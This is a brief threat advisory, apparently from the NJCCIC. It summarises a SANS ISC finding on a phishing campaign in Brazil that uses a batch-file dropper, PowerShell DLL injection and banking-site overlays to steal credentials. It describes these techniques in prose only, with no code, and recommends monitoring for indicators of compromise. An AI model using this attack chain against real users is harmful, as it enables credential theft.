Phishing Campaign Using DOS Batch File to Distribute Malware

A SANS ISC researcher recently discovered a phishing campaign attempting to distribute a banking trojan using a DOS Batch file as a dropper. Due to the method in which this malware spreads, the .bat file used is currently undetected by major antivirus software engines. The phishing emails in this campaign contain a ZIP file attachment. When the ZIP file is opened and the 2.6 KB .bat file is extracted, it identifies the target system’s processor architecture and then downloads additional malware via PowerShell. The PowerShell script injects a malicious DLL into either the explorer.exe or svchost.exe process. It then collects additional information about the system, such as geolocation and any banking software that is installed on the system, sending it back to the attacker through an HTTP connection. If the victim attempts to access a financial institution’s website, the banking trojan will create a screen overlay to capture the victim’s login credentials. Although this campaign is currently targeting victims in Brazil, the NJCCIC assesses with high confidence that this tactic will increasingly be used to target victims in other countries, including those within the US. The NJCCIC recommends reviewing the SANS ISCreport and proactively monitoring systems and networks for the associated indicators of compromise.